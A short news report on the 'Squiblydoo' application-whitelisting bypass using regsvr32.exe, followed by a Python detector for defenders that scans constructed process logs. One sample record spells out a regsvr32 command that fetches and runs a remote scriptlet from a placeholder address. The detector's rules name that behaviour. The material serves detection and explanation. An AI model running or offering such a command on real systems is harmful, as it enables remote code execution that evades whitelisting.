Native OS tools, living off the land… it’s all very crunchy
Hackers have figured out how to bypass application whitelisting software by utilising tools that are built into Windows by default.
Squiblydoo allows a user with normal privileges to download and execute a script hosted on a remote server.
All of this is done with signed Microsoft binaries that are installed with the operating system.
The technique offers a mechanism for hackers to run unapproved scripts on systems that are set up to block such software and are only supposed to allow kosher code to run, as explained in more detail in a blog post by security firm Carbon Black (extract below).
Squiblydoo utilizes the binary regsvr32.exe (a command-line utility to register and unregister OLE controls, such as DLLs and ActiveX controls in the Windows Registry) to download an XML file that contains scriptlets for executing code on the victim machine… Attackers can utilize ActiveX and embed custom VB or JS in the XML file to carry out any type of attacks.
Carbon Black warns that Squiblydoo is geared towards evading detection and blocking mechanisms.
The technique evident in Squiblydoo continues a trend of attackers using native OS tools to conduct attacks, previously seen with malware written in PowerShell, it adds. ®
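As an added defender-side example, not code from the article or from Carbon Black's post: a small Python detector run over constructed process-creation log records that flags regsvr32.exe launched with a URL on its command line, the remote-download behaviour described above. The scrobj.dll check and the Office-parent check are assumptions drawn from general knowledge of this technique, not from the page; the sample records and addresses are constructed.

```python
import re
from urllib.parse import urlparse

# Constructed process-creation records (a simplified Sysmon Event ID 1 shape);
# none of these come from the article or from Carbon Black's post.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": r"regsvr32.exe /s C:\Program Files\Vendor\control.ocx",
     "parent": r"C:\Program Files\Vendor\setup.exe"},
    {"image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": r"regsvr32.exe /s /n /u /i:http://203.0.113.10/update.xml scrobj.dll",
     "parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"},
    {"image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c echo hello",
     "parent": r"C:\Windows\explorer.exe"},
]

URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}  # assumption

def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def analyze_event(event):
    """Return (rule_name, detail) findings for a single process-creation record."""
    if basename(event["image"]) != "regsvr32.exe":
        return []
    cmd = event["cmdline"]
    findings = []
    # Legitimate use registers a local file; a URL on the command line means
    # regsvr32 is being pointed at a remote scriptlet, as the article describes.
    for url in URL_RE.findall(cmd):
        findings.append(("regsvr32_remote_scriptlet", urlparse(url).hostname))
    # scrobj.dll is the Windows Script Component runtime; regsvr32 loading it
    # is scriptlet hosting rather than ordinary COM registration (assumption).
    if "scrobj.dll" in cmd.lower():
        findings.append(("regsvr32_scriptlet_host", "scrobj.dll"))
    # An Office application spawning regsvr32 raises the severity of a hit.
    if findings and basename(event["parent"]) in OFFICE_PARENTS:
        findings.append(("office_parent", basename(event["parent"])))
    return findings

def scan(events):
    """Map record index -> findings for every record that triggers a rule."""
    return {i: f for i, e in enumerate(events) if (f := analyze_event(e))}

if __name__ == "__main__":
    for idx, hits in scan(SAMPLE_EVENTS).items():
        print(idx, hits)
```

The first record (a vendor installer registering a local .ocx) produces no findings, which is the false-positive case a rule keyed only on the regsvr32 image name would miss.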